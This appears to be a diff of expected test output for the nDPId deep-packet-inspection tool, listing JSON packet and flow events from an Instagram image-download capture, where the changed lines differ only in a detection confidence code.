02377{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1436720900716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900716,"pkt":"QPMIw47hABsv8H60CABFAAW+uH1AADkGTewuIUagwKgAZwBQl6CnSNXfj\/UmaIAQAiku5gAAAQEICprfPdsAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjU3OjA4IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTUwMDMxDQpDYWNoZS1Db250cm9sOiBuby10cmFuc2Zvcm0sIG1heC1hZ2U9MTIwOTYwMA0KRXhwaXJlczogU3VuLCAyNiBKdWwgMjAxNSAxNzowODoyMCBHTVQNCkRhdGU6IFN1biwgMTIgSnVsIDIwMTUgMTc6MDg6MjAgR01UDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AfFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABfHAIoAFpGQk1EMjMwMDA5NjkwMTAwMDBjMzQ3MDAwMDEzNjQwMDAwNjM4NDAwMDA4MzJiMDEwMDBiODUwMTAwODdkZjAxMDAwZDRhMDIwMDlkYTIwMjAwNzY3MzAzMDAA\/9sAQwAGBgYGBgY
LBgYLEAsLCxAVEBAQEBUbFRUVFRUbIBsbGxsbGyAgICAgICAgJycnJycnLS0tLS0zMzMzMzMzMzMz\/9sAQwEICAgNDA0WDAwWNSQeJDU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1NTU1\/8IAEQgEDwQPAwEiAAIRAQMRAf\/EABwAAAEFAQEBAAAAAAAAAAAAAAUBAgMEBgAHCP\/EABoBAAMBAQEBAAAAAAAAAAAAAAABAgMEBQb\/2gAMAwEAAhADEAAAANnYrv6OWePnpwvl4Ucr5ZqutmsxzGNFZbBKECWI2oX8gp+rqOdscgJarTJrPTiAtUZEnHz0qOljcEskD1c01Rksi2ko7C10FaSJqLDY0bkkglRK+J01IqIm99eIL6jmheWgjCKVJUTsjcmxJXNVG3K1KNr3irtvMCithKVbraoq9cQKb5mse+vydpRzhEXinDIvFyoIspSDsdW4LfVORbSFGS9z0Q07Vapihe24SRFCV8D5p7U4fInJNSacY9CnDoLekTpOusTppdQVRUWk5Z3S6nSOaiisOZWrWqtSjFjqVjcxzA+ktxbdV5FmYfOO1PR5O6tOVN6dGCvruavqOenPG2AT0hWptvhfNzvglTijkaS2WB9FlYElvdXcE7qNkc6sYnO6nwWWwvB6cwHJ3BI+Pk7LqzU7SQPCRiRBzWw1M8o9Wr7h8yd2Yes0RUdMne6nInZbXUcjq0gpefEOw6FZdhsSpo1\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\/QKOx0ChM6u5EjoeCVY+ZIiIA="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"instagram.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1436720900717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900717,"pkt":"ABsv8H60QPMIw47hCABFAAA0wXFAAEAGQ4LAqABnLiFGoJegAFCP9SZop0jbaYAQH+o19wAAAQEICgAD63Sa3z3b"} 
02375{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1436720900744,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900744,"pkt":"QPMIw47hABsv8H60CABFAAW+u1hAADkGUttSVRqiwKgAZwBQ4lApkhzMOpIM7IAQAku18QAAAQEIClYLL1sAA+txSFRUUC8xLjEgMjAwIE9LDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDExIEp1bCAyMDE1IDE2OjMyOjE3IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9qcGVnDQpDb250ZW50LUxlbmd0aDogMTEyMjY4DQpEYXRlOiBTdW4sIDEyIEp1bCAyMDE1IDE3OjA4OjIwIEdNVA0KQ29ubmVjdGlvbjoga2VlcC1hbGl2ZQ0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0xMjA5NjAwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/+0AbFBob3Rvc2hvcCAzLjAAOEJJTQQEAAAAAABPHAIoAEpGQk1EMGYwMDA3NWIwMTAwMDBjZDFlMDAwMDUxNmQwMDAwYTY3YjAwMDBkMzhhMDAwMDQ3MTMwMTAwZDU4MDAxMDA4Y2I2MDEwMAD\/2wBDAAMCAgMCAgMDAwMEAwMEBQgFBQQEBQoHBwYIDAoMDAsKCwsNDhIQDQ4RDgsLEBYQERMUFRUVDA8XGBYUGBIUFRT\/2wBDAQMEBAUEBQkFBQkUDQsNFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBT\/wgARCAKAAoADASIAAhEBAxEB\/8QAHQAAAAYDAQAAAAAAAAAAAAAAAAECAwUGBAcICf\/EABsBAAIDAQEBAAAAAAAAAAAAAAABAgMEBQYH\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"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"instagram.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1436720900745,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720900745,"pkt":"ABsv8H60QPMIw47hCABFAAA00CZAAEAGPJfAqABnUlUaouJQAFA6kgzsKZIiVoAQH3QuLQAAAQEICgAD63dWCy9b"} 
02366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1436720900872,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900872,"pkt":"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"} 02372{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1436720900873,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900873,"pkt":"QPMIw47hABsv8H60CABFAAW+QeZAADkGzDZSVRq5wKgAZwBQ4m1aOH8QBPBEEYAQAktstgAAAQEIClnq0tgAA+t6yOoxEtjJYMe0j6G03geIuahaK1oTHsEliMMTZ8IV3w+jNLnJcKpRQYoNH0Q1owU7ElIg1BvY00M1sKh00GrYYaKmxapIfSuhKlliV5Ggz2ZEdUXqEuURYhcRmGdF6HkVYKkoGKmh3bGvRvDFLCRD9sysMedkSiftieCrscIysGDeGZuR52JNFJwy1gdIqmuE8SC43k2NNmXvnK0LZ7Q9kdYKlspkg9CZoqhXWJtbKpgafXBrJWhOsqdlcjGlMIf02UEyYUEoN\/R3BPJjY2bCG2s0iEvRRNQ+jO4xqKDwyI0ohahosjThi9BIrI7gehuDWUCCJLBXotaGI3Qlg0wJ4IVBKoTow2PA\/UqeR2ILqdQ62OGMraO4hekPhuNoceBSE3cCJmskaK+hP2IZK1kxs+D0NwaUQbYMYurNlQeMoTLYsrBUslTyTGB4bJjIpUh1Csyxlol2o3gucCaI7VzLkaJHRLOOI9DqwQy9GXvictCZRvBROF7M75lwMNqMbA1Q7yIm8GJWsFybGm8jbOi8hKnkr2M2jAtIEustYo61E\/YmmP6L0b3whJbGvRDYcGUzATfFIDVQIw2Oobux01kTo0N6FINdmGBYdKOUophoRJtodkbFVo9gsdiVGqholRuBaWjGKEmDKSSFXnjQZrsSagmHGQ2V6YSOqJlWjZkzB3BjS9mOWLBMSDwqGspicFTSY2vRnKTsOEJT6izJU3UzZMYLFNbFHhcKrhEElmjUHgsGw3eFliqL7LktKtGhuCzshGkdcMxokwNDSEy0x5WRazwkNsaY8bLNjG6JXCGsDRGmNiieYQKFSLNMh9GJBBqDcYmQ\/TLYs4Y5okeCCq6KrROsWRPA\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\/QQ2lsbbGNL0REErSTiKuDRksFTw2JZIJTbY1oaZGzXwTzsbdEiLmog0Ji7YqmN+hroiag0PQeUVDI9mcQw6G101ZROVMQtGQ7eH6WaIbNDwsDsK10NpNDbcMrspisEOJISYYqTRU0RDqgVWGQxaXIsvmpFmWPDA8
JDDqHRSQsC9DYnnBYhpbF9KmJvaYk7Ktm8jfrhZcJnL5r4twNjbk="} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720900692,"flow_last_seen":1436720900873,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":1031,"midstream":1,"thread_ts_msec":1436720900873,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":180,"source":"instagram.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1436720900692,"flow_last_seen":1436720900873,"flow_idle_time":7580000,"flow_min_l4_payload_len":259,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":1031,"midstream":1,"thread_ts_msec":1436720900873,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.185","src_port":57965,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-f.ak.instagram.com","url":"photos-f.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11424623_1608163109450421_663315883_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; 
it_IT)"}} 02391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1436720900875,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720900875,"pkt":"QPMIw47hABsv8H60CABFAAW+G2lAADkG8rJSVRq6wKgAZwBQrVt8zLRbo9aCTYAQAxSDewAAAQEIClRjBa0AA+t+qDhdSVH1chUH1JtbCJY\/b9U\/35z\/AIcB2iAbyHujCEFNZ+I0eU8EOIX\/AEB\/qRwVo9Wlp5znKiVYRroroyxNdVdiE6kdYXRMS3KcwBs+EyuWZYuo52fCGCiRaGhDCm0eStltza5zDLVQe2oxt2qbSrdR5pHTZPJaAK7JTxSrekwfflKFROdJwg5Y1CyNVSaHSVxDS0CVTMOVI9v3UgC122i67XHxCfXa5p2RquKuPMJ1XpUxG6NIvp3blVKRpiVRMtCZ59+YOFU7DcnU6dTOhRpECHZCLSwomfujLIK9xojog5ZGQgQ5VGxza\/YotDtEQRr+RTZe72UhDK0U\/Sg+fuESn9pT0VTtKEFOlWOQYBlU6VNyNOjonUmH0p7LdOTSD6k6C1Oj5p\/wckoMOHKYPO3tlU9WFVKbrygB07fGU4txhOccQn+qSgN0CjqgJbEqm5ow5FksvA7VeZ7f3Tajd904VNW6JjQ5ncntFPTPhDtGVPjVZB91ncoRE8oIyp5N9S4cEODlVJp1JmA5fEBxtqYKqUOqP+\/zSg5U2tcI3K4r1W6whjKbVcNE4l2TyDtij7fIFHV4f3CoGWKuyWKj6ICHjmTYVF4grovG6HUCdTvzon0H6hVh+C1MMIt8ICE07KNwg+cFOZuEeTXFquDtU5vj5onCADRCuEIOGmi9bcI9qe6Hh\/lSnr\/LyBA0QtO6w38TUIwWwCvsgy3VFt7sqxzT7KwyZTqc5blYj3X06flx+dK1UrEqM45DARcbWwqkkymmJC+hEywLVAnRSFLZ0Uh2F02s75QrdN3lqFtZuO1OGwcuGqOAgqpFMWFAx6lcXdgGuiNNzYCtMzGE+FGJWdEJR5BUG9p91xTbqM+Ewy22pp5VKoaLu4\/b5BzCouE52V4uc5eoyu2IHzQgtMrhTPaqXY51NHLYVLteWrXnUbcEx1pUhytVgUIjzlVKH10\/2UhqqcmlOQfGqIDtF7I45NMpzflptJyiG\/dbyiJTaj6ZTiKrbmo5ZHhMMtRKf5RzypychE\/TsrBP6osiBO6jfYoVBq4Jz6ZGNEfUA7KqOaIsRYcFuUx8DCcaZ9QXSpu0cjw7\/pyoI1\/xGLV7rflJtjkMIOwg4rTVSeRlD3WuyIIAXoy5qI\/DENgr4jNzxlPqdUrUhEuZmFfdl26N8xOAjGpXr9KDMp\/b2cg5m4lf8u76E2rRtxKi+mQqYlpb4VNj\/S8YREfJPzBEfKCVMohcObXqr2Vg\/wAoZTxbXnyhp8j25QMIOKL0AdeU2PhcRSg3t3TXfS5FiaY1TvI5B0JrhqnsZU7giFog4OwU4cxkwtBCPLZaoE0nIgeoaJuJatkdORVDu7Toi3xGE7KLogHZdS37K7Ca7OUXI936Koe0CUDyCBTg2qId+6LS11rvzZ\/KZqoJ5brPLTlEqFoVKuOCobMhCqWm1Q6YKtduV+OT5hOoPnKDcL0EYwpFTRQ3Mp0GIELLsnZXv0CudC115sBL
wAumQ2Vw7vxLTo5VPwqxxKbWp7ynCfyJwpUrqNIh3yxATdVsqUmqFUZ1GLh3EiDsq7e27wm6IhBQnBQoTGSZPIhVh23eFh7IKLc2ldzcFEbpr9kfPNr\/ACqudEeV550hHepk45Bao6qoMSqTx6XJ4teObhypm39E24i9wQd3SVUI2TsnKnZXYgrJ0TO3ITjPIK5XJpVRvVb77f4WZ5M9QUG4hbcsrbkFK+3INkwoA7TsrTspB9WEa3bnXyu5xl6p1XUk6qXbo5gxgJ\/cwRsi0jVNBQLtxhXSSSnFzk4QMr6UQYley4MfidR2jVVqGpk4b48oVXdZrzsuNbkOCHDuPc7tHvycN\/ywOYTlupwuHbm9bJ3Y8P8AKIuCpnCBwsSgii1WocyEzwuKp4s="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1436720900876,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1436720900876,"pkt":"ABsv8H60QPMIw47hCABFAABQv9ZAAEAGTLPAqABnUlUauq1bAFCj1oJNfMxlZ\/AQEUsuYQAAAQEICgAD64RUYwVLAQEFGnzMtFt8zLnlfMypR3zMrtF8zJKnfMyYMQ=="} -00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720900690,"flow_last_seen":1436720900876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":773,"midstream":1,"thread_ts_msec":1436720900876,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
+00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":185,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1436720900690,"flow_last_seen":1436720900876,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3095,"flow_avg_l4_payload_len":773,"midstream":1,"thread_ts_msec":1436720900876,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901182,"flow_last_seen":1436720901182,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1436720901182,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"77.67.29.17","src_port":33976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1436720901182,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/BAAEAGs3DAqABnTUMdEYS4AFDrYaSj8+woZ4AQH+origAAAQEICgAD66NkobAz"} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1436720901182,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720901182,"pkt":"ABsv8H60QPMIw47hCABFAAA0W\/FAAEAGs2\/AqABnTUMdEYS4AFDrYaSj8+wze4AQH+origAAAQEICgAD66NkobA0"} 02385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"instagram.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1436720901183,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720901183,"pkt":"QPMIw47hABsv8H60CABFAAW+nH9AADkGdFdNQx0RwKgAZwBQhLjz7DN762Gko4AQAq9DyQAAAQEICmShsDQAA+ufWEdJBRPnaSmosKHYDmQEyGHV3GAwTrGe5kQxyGEYyxmyELBrJc+SMi3dmmwq1mAYjd9asgZG6SWIbmuecSeibLvJUKPOw0JlNLd+SsFoR4AyWWZMuWzjy22t8lg9nL1yby0j7G5yGHP2UfvrthqhUQLZPhRPRii5ZImLbbxtBh75Nwi10QstpiiOURwgsk\/gse0fhODW3xEaIlCTuwGMxEsajO6KBwgVZE4oD8EZJ8CUI+IftidbAnEAzCB+CxiXeSUkT7I4PLvoy1NnMNCUuGI63ybZNQBpkMtmgmFlmfthxhK9DguCw4XPNprshLbUVoAbHdBaG0WibQPaUDoawN0QnEMFu5OOsEXu+c3ydgozRy0R9FbV0F8hsoSyHLIicGyGMakQqAYSTks8J\/2+\/kORfizOWuAtMcMCSaUPfEY6f\/ttodWXWPLX7bzs5o8i2FH5IZ4wLEpEOhwV2MADYJIWDBmF9CQdn6hh1kzmvWM7b4SuFg+iI0QmrTgRgMl\/rAMZDtwdyKQyk+DPksJTgtrhZZRA\/GY+X2oyKfiboDY0NouOzUthrGCw4
ToWxqMKM+rf1sDDAEsjSzJB7rCfcDOwibANVH23SwWhh5rFCY04ksXdhurOKpIBQXzCwN2yHF8S1j2hc2z0kMsCW+OeS+e5HaaRoyzZaCzPNrgnwkhY7i8yZQkeMkH4woSzgHZw7AMoJTs5nD21BiRDuFCBqB4lGX+kk55UTfE62aMJ9jBPBhqltnyYDTEarQKEsWGbVjV7cRHRc\/JgmbZkQlW0YI\/xZdFg6wN2R+J3fOBbBmIcOvB5bIKiWTEFFXRESk7pA\/G3UwXXKB8XDGTJIAkPv49GZuMRZBkC+FhZzCzZ\/iYJh8LIJjV10uzY7Q6E8RpFbyee3Ru25UC5ETbDsFPCaR1ZZC+Qlrsu3Z2QOnm5Ijct96wHLCiQoCUx5CFCGTynRCNjadMyB8tlLRKCwv7KX++dvy1I4Ngs+X8bALTsRQ81XIDydJihBYicmO+O5EykyOu25b+jIYCOXX2WfISuvyX8JiI2GJxqYZEg+OZPoDhxBrn8TYtguClNRehGIQDtqZcwjb\/V86w0sQMOHMZzpnYBjpA8i2eJoGlmik3CQHHMRm8DxLkyFvCZWDFGTUEVI6mHEnfCoaSoN+\/pJIKAlCT4XxDOVC6F8g19jfq1eEJAj0k3u3yFtEJC0DXJolurtJkzJ6y5KHJWSGujZ7ucFS0YjpIoSX0blPAySPJvg33fP2OLma7cQ\/o6PyUHgctick8cobWRNWzIJG3koi8vkKbBIHEMIhdatBUZ40kmN4wtVBz4xoAKljf4v6tXAUt\/sabl0bLkuRE5KikyGgBCbojsrcdwSEGEBomIUFpEl4TvPOqQ8EQF08if3O9FnhnUw2jwQHpaPsw+3EzgNs0zWy6OB623FWGwH7yRctwfDWnw6uSz7AvbHpmHBs+lzanaBkBBq2DLF24dyAfJ1fyW2F8GD9sWLVnjCGZF3EsLst8bQIxxKOwYkoOS2WRsw0xVMJlnywe3Dcc8w+9gQNiBfxyDpYA\/BXzFgEQ3SDtI\/Iov2XBZk1lmPY59tj\/SH+23V5dy\/iiOkLW8UdeiSozNTMFJIdoa309Kn34h+DTnlxZPJVqKRj7du3Uk37CetFC6vFxS2151HHC6aWXemK7B3BpAILjJ\/RL8v0ZA5dOz14w3bAaJWBEg+oUMkesS4WzNnMtGFzWDqZOmcWARMZvW5QUXehDRGok1aYS2VUwcI4nRFkmR4HYk3YsQQ7hbSjts4wBuESi5cIWAPkICk+lgVslThZsIux2ZS+mHik4DwoYI7IF8QlYXTsSiw2By7i5s7AeQhpAzljeQfkQaQPQMK5P3IVCAQHZWMgI="} -00966{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":255,"source":"instagram.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720900690,"flow_last_seen":1436720901259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24614,"flow_avg_l4_payload_len":769,"midstream":1,"thread_ts_msec":1436720901259,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.186","src_port":44379,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-e.ak.instagram.com","url":"photos-e.ak.instagram.com\/hphotos-ak-xaf1\/t51.2885-15\/e35\/11379148_1449120228745316_607477962_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7580000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00816{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1436720901262,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":324,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":324,"pkt_l4_len":290,"thread_ts_msec":1436720901262,"pkt":"ABsv8H60QPMIw47hCABFAAE2VBZAAEAGt67AqABnUlUamZHmAFCdoJYSxR9Z0oAYDfbnvwAAAQEICgAD66tZ6cc2R0VUIC9ocGhvdG9zLWFrLXhmYTEvdDUxLjI4ODUtMTUvZTM1LzExMjQ4ODI5Xzg1Mzc4MjEyMTM3Mzk3Nl85MDk5MzY5MzRfbi5qcGc\/c2U9NyBIVFRQLzEuMQ0KSG9zdDogcGhvdG9zLWEuYWsuaW5zdGFncmFtLmNvbQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogSW5zdGFncmFtIDcuMS4xIEFuZHJvaWQgKDE5LzQuNC4yOyA0ODBkcGk7IDEwODB4MTkyMDsgc2Ftc3VuZzsgR1QtSTk1MDU7IGpmbHRlOyBxY29tOyBpdF9JVCkNCg0K"} 
-00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7580000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-a.ak.instagram.com","url":"photos-a.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11248829_853782121373976_909936934_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":262,"source":"instagram.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720901262,"flow_last_seen":1436720901262,"flow_idle_time":7580000,"flow_min_l4_payload_len":258,"flow_max_l4_payload_len":258,"flow_tot_l4_payload_len":258,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1436720901262,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"82.85.26.153","src_port":37350,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Instagram","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"photos-a.ak.instagram.com","url":"photos-a.ak.instagram.com\/hphotos-ak-xfa1\/t51.2885-15\/e35\/11248829_853782121373976_909936934_n.jpg?se=7","code":0,"content_type":"","user_agent":"Instagram 7.1.1 Android (19\/4.4.2; 480dpi; 1080x1920; samsung; GT-I9505; jflte; qcom; it_IT)"}} 
